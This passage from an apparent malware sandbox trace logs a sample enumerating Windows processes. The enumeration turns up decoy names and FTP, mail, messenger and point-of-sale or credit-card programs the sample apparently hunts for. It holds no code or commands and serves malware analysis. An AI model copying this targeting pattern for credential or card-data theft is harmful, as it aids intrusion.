lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.089] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0270.092] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0270.093] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.095] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0270.096] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.097] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0270.099] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0270.100] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0270.102] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.103] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.105] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0270.106] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.108] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.110] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.111] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.113] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.114] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.116] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.117] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0270.119] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0270.120] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0270.266] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.268] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0270.269] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0270.271] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0270.274] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0270.276] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.281] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0270.283] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0270.285] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0270.286] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0270.288] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0270.289] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0270.291] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0270.292] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0270.297] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0270.299] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0270.301] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0270.302] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0270.304] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0270.306] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0270.307] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0270.348] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0270.351] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0270.353] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0270.355] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0270.360] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0270.363] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0270.365] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0270.367] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0270.369] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0270.371] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0270.377] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0270.378] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0270.380] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0270.382] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0270.384] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0270.386] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0270.424] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0270.426] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0270.428] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0270.430] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0270.432] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0270.434] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0270.439] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0270.440] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0270.442] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0270.444] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0270.446] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0270.447] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0270.449] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0270.455] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0270.457] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0270.459] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0270.461] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0270.463] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0270.519] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0270.522] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0270.524] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0270.525] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0270.530] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0270.532] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0270.533] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: 